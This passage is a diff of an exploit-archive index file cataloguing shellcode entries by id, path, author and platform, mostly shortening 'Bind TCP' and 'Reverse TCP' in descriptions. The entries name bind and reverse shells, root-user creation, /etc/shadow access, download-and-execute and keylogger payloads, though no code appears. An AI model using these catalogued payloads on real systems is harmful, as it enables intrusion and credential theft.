bytes)",2016-08-10,thryb,shellcode,linux_x86 +40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86 40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA() Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40246,shellcodes/windows_x86/40246.c,"Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40259,shellcodes/windows_x86/40259.c,"Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86 -43562,shellcodes/linux_x86-64/43562.c,"Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 +43562,shellcodes/linux_x86-64/43562.c,"Linux/x64 - Bind (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 43563,shellcodes/linux_x86-64/43563.c,"Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 43564,shellcodes/linux_x86-64/43564.c,"Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 43565,shellcodes/linux_x86-64/43565.asm,"Linux/x64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64 -43566,shellcodes/linux_x86-64/43566.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 -43568,shellcodes/linux_x86-64/43568.asm,"Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 -43570,shellcodes/linux_x86-64/43570.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 -43597,shellcodes/linux_x86-64/43597.c,"Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64 -43598,shellcodes/linux_x86-64/43598.c,"Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 -43599,shellcodes/linux_x86-64/43599.c,"Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 -43601,shellcodes/linux_x86-64/43601.asm,"Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 -43602,shellcodes/linux_x86-64/43602.asm,"Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 +43566,shellcodes/linux_x86-64/43566.asm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 +43568,shellcodes/linux_x86-64/43568.asm,"Linux/x64 - Reverse (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 +43570,shellcodes/linux_x86-64/43570.asm,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 +43597,shellcodes/linux_x86-64/43597.c,"Linux/x64 - Bind (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64 +43598,shellcodes/linux_x86-64/43598.c,"Linux/x64 - Bind (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 +43599,shellcodes/linux_x86-64/43599.c,"Linux/x64 - Reverse (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 +43601,shellcodes/linux_x86-64/43601.asm,"Linux/x64 - Bind (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 +43602,shellcodes/linux_x86-64/43602.asm,"Linux/x64 - Reverse (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 43603,shellcodes/linux_x86-64/43603.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 43604,shellcodes/linux_x86-64/43604.c,"Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 43605,shellcodes/linux_x86-64/43605.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 @@ -612,23 +612,23 @@ id,file,description,date,author,type,platform 43607,shellcodes/linux_x86-64/43607.c,"Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64 43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86 43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc -43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc +43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse (/TCP) Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc 43612,shellcodes/osx_ppc/43612.asm,"OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc 43613,shellcodes/osx_ppc/43613.asm,"OSX/PPC - Stager Sock Find Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc 43614,shellcodes/osx_ppc/43614.asm,"OSX/PPC - Stager Sock Reverse Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc -43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind TCP (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc +43615,shellcodes/osx_ppc/43615.c,"OSX/PPC - Bind (8000/TCP) Shell + OSXPPCLongXOR Encoded Shellcode (300 bytes)",2009-01-01,"H D Moore",shellcode,osx_ppc 43616,shellcodes/osx_ppc/43616.asm,"OSX/PPC - execve(/bin/sh) + Null-Free Shellcode",2009-01-01,ghandi,shellcode,osx_ppc 43617,shellcodes/osx_ppc/43617.c,"OSX/PPC - execve(/bin/sh_[/bin/sh]_NULL) + exit() Shellcode (72 bytes)",2009-01-01,haphet,shellcode,osx_ppc 43618,shellcodes/osx/43618.c,"OSX/x86 - execve(/bin/sh) Shellcode (24 bytes)",2009-01-01,haphet,shellcode,osx 43626,shellcodes/linux_x86/43626.c,"Linux/x86 - Add User (t00r/t00r) PexFnstenvSub Encoded Shellcode (116 bytes)",2009-01-01,vlad902,shellcode,linux_x86 43627,shellcodes/bsd_x86/43627.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + execute /bin/sh Shellcode (57 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 -43628,shellcodes/bsd_x86/43628.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind TCP (2222/TCP) Shell Shellcode (133 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 -43629,shellcodes/bsd_x86/43629.c,"BSD/x86 - Bind TCP (2222/TCP) Shell Shellcode (100 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43628,shellcodes/bsd_x86/43628.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) + Bind (2222/TCP) Shell Shellcode (133 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43629,shellcodes/bsd_x86/43629.c,"BSD/x86 - Bind (2222/TCP) Shell Shellcode (100 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 43630,shellcodes/linux_x86/43630.c,"Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes)",2009-01-01,dev0id,shellcode,linux_x86 43631,shellcodes/linux_x86/43631.c,"Linux/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,linux_x86 43621,shellcodes/solaris_sparc/43621.c,"Solaris/SPARC - setreuid(geteuid()) + setregid(getegid()) + execve(/bin/sh) Shellcode",2009-01-01,"Claes M. Nyberg",shellcode,solaris_sparc -43622,shellcodes/solaris_sparc/43622.asm,"Solaris/SPARC - Bind TCP (2001/TCP) Shell (/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,solaris_sparc -43623,shellcodes/solaris_sparc/43623.asm,"Solaris/SPARC - Bind TCP Shell Shellcode",2009-01-01,vlad902,shellcode,solaris_sparc +43622,shellcodes/solaris_sparc/43622.asm,"Solaris/SPARC - Bind (2001/TCP) Shell (/bin/sh) Shellcode",2009-01-01,ghandi,shellcode,solaris_sparc +43623,shellcodes/solaris_sparc/43623.asm,"Solaris/SPARC - Bind (/TCP) Shell Shellcode",2009-01-01,vlad902,shellcode,solaris_sparc 43624,shellcodes/solaris_x86/43624.asm,"Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes)",2009-01-01,"John Babio",shellcode,solaris_x86 43625,shellcodes/solaris_x86/43625.c,"Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,shellcode.com.ar,shellcode,solaris_x86 43632,shellcodes/bsd_x86/43632.c,"BSD/x86 - setuid(0) + Break chroot (../ 10x Loop) Shellcode (34 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 @@ -644,7 +644,7 @@ id,file,description,date,author,type,platform 43643,shellcodes/linux_x86/43643.c,"Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,linux_x86 43644,shellcodes/bsd_x86/43644.asm,"BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 43645,shellcodes/bsd_x86/43645.asm,"BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 -43646,shellcodes/linux_x86/43646.c,"Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)",2009-01-01,lamagra,shellcode,linux_x86 +43646,shellcodes/linux_x86/43646.c,"Linux/x86 - Bind (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)",2009-01-01,lamagra,shellcode,linux_x86 43647,shellcodes/linux_x86/43647.c,"Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)",2009-01-01,Shok,shellcode,linux_x86 43648,shellcodes/linux_x86/43648.c,"Linux/x86 - Disable Shadowing Shellcode (42 bytes)",2009-07-04,vlan7,shellcode,linux_x86 43649,shellcodes/linux_x86/43649.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)",2009-07-04,vlan7,shellcode,linux_x86 @@ -654,7 +654,7 @@ id,file,description,date,author,type,platform 43653,shellcodes/linux_x86/43653.c,"Linux/x86 - execve(/sbin/shutdown_/sbin/shutdown 0) Shellcode (36 bytes)",2009-07-11,TheWorm,shellcode,linux_x86 43654,shellcodes/linux_x86/43654.c,"Linux/x86 - execve(/sbin/reboot_/sbin/reboot) Shellcode (28 bytes)",2009-07-11,TheWorm,shellcode,linux_x86 43655,shellcodes/linux_x86/43655.c,"Linux/x86 - execve(/sbin/halt_/sbin/halt) Shellcode (27 bytes)",2009-07-11,TheWorm,shellcode,linux_x86 -43656,shellcodes/linux_x86/43656.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)",2009-01-01,storm,shellcode,linux_x86 +43656,shellcodes/linux_x86/43656.c,"Linux/x86 - Bind (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)",2009-01-01,storm,shellcode,linux_x86 43657,shellcodes/linux_x86/43657.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes)",2009-01-01,storm,shellcode,linux_x86 43658,shellcodes/linux_x86/43658.c,"Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes)",2009-01-01,storm,shellcode,linux_x86 43660,shellcodes/linux_x86/43660.c,"Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)",2009-01-01,anonymous,shellcode,linux_x86 @@ -669,8 +669,8 @@ id,file,description,date,author,type,platform 43671,shellcodes/linux_x86/43671.c,"Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes)",2009-01-01,bob,shellcode,linux_x86 43672,shellcodes/generator/43672.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator 43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86 -43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86 -43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86 +43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86 +43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86 43677,shellcodes/linux_x86/43677.c,"Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes)",2009-01-01,eSDee,shellcode,linux_x86 43679,shellcodes/linux_x86/43679.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86 43680,shellcodes/linux_x86/43680.c,"Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86 @@ -688,7 +688,7 @@ id,file,description,date,author,type,platform 43695,shellcodes/linux_x86/43695.c,"Linux/x86 - Force unmount /media/disk Shellcode (33 bytes)",2010-06-04,gunslinger_,shellcode,linux_x86 43696,shellcodes/linux_x86/43696.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes)",2009-01-01,agix,shellcode,linux_x86 43697,shellcodes/linux_x86/43697.c,"Linux/x86 - CDRom Ejecting + Polymorphic Shellcode (74 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86 -43698,shellcodes/linux_x86/43698.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86 +43698,shellcodes/linux_x86/43698.c,"Linux/x86 - Bind (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86 43699,shellcodes/linux_x86/43699.c,"Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)",2009-01-01,"John Babio",shellcode,linux_x86 43700,shellcodes/linux_x86/43700.c,"Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)",2009-01-01,"John Babio",shellcode,linux_x86 43702,shellcodes/linux_x86/43702.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)",2009-01-01,Kernel_Panik,shellcode,linux_x86 @@ -707,12 +707,12 @@ id,file,description,date,author,type,platform 43722,shellcodes/linux_x86/43722.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2009-01-01,"Hamza Megahed",shellcode,linux_x86 43725,shellcodes/linux_x86/43725.c,"Linux/x86 - Force Reboot Shellcode (36 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86 43724,shellcodes/linux_x86/43724.c,"Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86 -43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 -43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 -43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 -43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 -43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + Null-Free Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 -43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) + Null-Free Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse (127.1.1.1:55555/TCP) Shell + Null-Free Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind (Random TCP Port) Shell + Null-Free Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind (1111/TCP) Shell + GetPC/Call/Ret Method + Null-Free Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind (1111/TCP) Shell + Null-Free Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter (0x50905090) + Null-Free Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43735,shellcodes/linux_x86/43735.c,"Linux/x86 - execve(/bin/sh) + Null-Free Shellcode (21 bytes) (6)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43736,shellcodes/linux_x86/43736.c,"Linux/x86 - Read /etc/passwd file + Null-Free Shellcode (51 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 @@ -721,12 +721,12 @@ id,file,description,date,author,type,platform 43739,shellcodes/linux_x86/43739.c,"Linux/x86 - execve wget + Mutated + Null-Free Shellcode (96 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43740,shellcodes/linux_x86/43740.c,"Linux/x86 - execve(/bin/sh) + Uzumaki Encoded + Null-Free Shellcode (50 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 43741,shellcodes/generator/43741.py,"Linux/x86 - Uzumaki Encryptor Shellcode (Generator)",2013-01-01,"Geyslan G. Bem",shellcode,generator -43742,shellcodes/linux_x86/43742.c,"Linux/x86 - Bind TCP (31337/TCP) Shell Shellcode (108 bytes)",2009-01-01,"Russell Willis",shellcode,linux_x86 +43742,shellcodes/linux_x86/43742.c,"Linux/x86 - Bind (31337/TCP) Shell Shellcode (108 bytes)",2009-01-01,"Russell Willis",shellcode,linux_x86 43743,shellcodes/linux_x86/43743.c,"Linux/x86 - /proc/sys/net/ipv4/ip_forward 0 + exit() Shellcode (83 bytes)",2009-01-01,"Hamid Zamani",shellcode,linux_x86 43744,shellcodes/linux_x86/43744.c,"Linux/x86 - Egghunter (0x5090) Shellcode (38 bytes)",2013-05-28,"Russell Willis",shellcode,linux_x86 43745,shellcodes/linux_x86/43745.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (30 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86 -43746,shellcodes/linux_x86/43746.c,"Linux/x86 - Bind TCP Shell Shellcode (112 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86 -43747,shellcodes/linux_x86/43747.c,"Linux/x86 - Reverse TCP (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86 +43746,shellcodes/linux_x86/43746.c,"Linux/x86 - Bind (/TCP) Shell Shellcode (112 bytes)",2013-07-03,"Russell Willis",shellcode,linux_x86 +43747,shellcodes/linux_x86/43747.c,"Linux/x86 - Reverse (127.1.1.1:12345/TCP) cat /etc/passwd Shellcode (111 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86 43748,shellcodes/linux_x86/43748.c,"Linux/x86 - Download File (http://192.168.2.222/x) + chmod() + execute Shellcode (108 bytes)",2009-01-01,"Daniel Sauder",shellcode,linux_x86 43749,shellcodes/linux_x86/43749.asm,"Linux/x86 - execve(/bin/sh) + Using jump/call/pop Shellcode (52 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86 43750,shellcodes/linux_x86/43750.asm,"Linux/x86 - Copy /etc/passwd to /tmp/outfile Shellcode (97 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86 @@ -734,12 +734,12 @@ id,file,description,date,author,type,platform 43752,shellcodes/linux_x86/43752.asm,"Linux/x86 - execve() Using JMP-FSTENV Shellcode (67 bytes)",2009-01-01,"Paolo Stivanin",shellcode,linux_x86 43753,shellcodes/linux_x86/43753.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)",2014-06-22,"Osanda Malith Jayathissa",shellcode,linux_x86 43754,shellcodes/linux_x86/43754.c,"Linux/x86 - shutdown -h now Shellcode (56 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86 -43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86 -43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86 +43755,shellcodes/linux_x86/43755.c,"Linux/x86 - Bind (1337/TCP) Shell Shellcode (89 bytes)",2014-07-13,"Julien Ahrens",shellcode,linux_x86 +43756,shellcodes/linux_x86/43756.c,"Linux/x86 - Reverse (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)",2014-07-25,"Julien Ahrens",shellcode,linux_x86 43757,shellcodes/linux_x86/43757.c,"Linux/x86 - setreuid() + execve(/usr/bin/python) Shellcode (54 bytes)",2014-05-08,"Ali Razmjoo",shellcode,linux_x86 43758,shellcodes/linux_x86/43758.txt,"Linux/x86 - execve() + ROT-7 Shellcode (Encoder/Decoder) (74 bytes)",2009-01-01,"Stavros Metzidakis",shellcode,linux_x86 -43759,shellcodes/windows_x86/43759.asm,"Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86 -43760,shellcodes/windows_x86/43760.asm,"Windows/x86 (2000) - Reverse TCP (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86 +43759,shellcodes/windows_x86/43759.asm,"Windows/x86 (NT/XP/2000/2003) - Bind (8721/TCP) Shell Shellcode (356 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86 +43760,shellcodes/windows_x86/43760.asm,"Windows/x86 (2000) - Reverse (192.168.0.247:8721/TCP) Connect + Vampiric Import Shellcode (179 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86 43761,shellcodes/windows_x86/43761.asm,"Windows/x86 - Create Administrator User (X) Shellcode (304 bytes)",2009-01-01,"H D Moore",shellcode,windows_x86 43762,shellcodes/windows_x86/43762.c,"Windows/x86 (XP SP3) (French) - Sleep 90 Seconds Shellcode (14 bytes)",2009-01-01,OpTix,shellcode,windows_x86 43763,shellcodes/windows_x86/43763.txt,"Windows/x86 (XP Professional SP2) (English) - Wordpad.exe Shellcode (15 bytes)",2009-01-01,Aodrulez,shellcode,windows_x86 @@ -754,55 +754,55 @@ id,file,description,date,author,type,platform 43772,shellcodes/windows_x86/43772.c,"Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (42 bytes)",2009-01-01,ZoRLu,shellcode,windows_x86 43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86 43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86 -43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm +43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm 43897,shellcodes/linux_x86/43897.nasm,"Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)",2018-01-26,0xAlaufi,shellcode,linux_x86 43890,shellcodes/linux_x86/43890.c,"Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)",2018-01-23,"Hashim Jawad",shellcode,linux_x86 40549,shellcodes/windows_x86-64/40549.c,"Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86 -40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86 +40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 40808,shellcodes/linux_x86-64/40808.c,"Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 40821,shellcodes/windows_x86-64/40821.c,"Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86 +40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse (/TCP) Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86 40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86 -40981,shellcodes/windows_x86-64/40981.c,"Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan 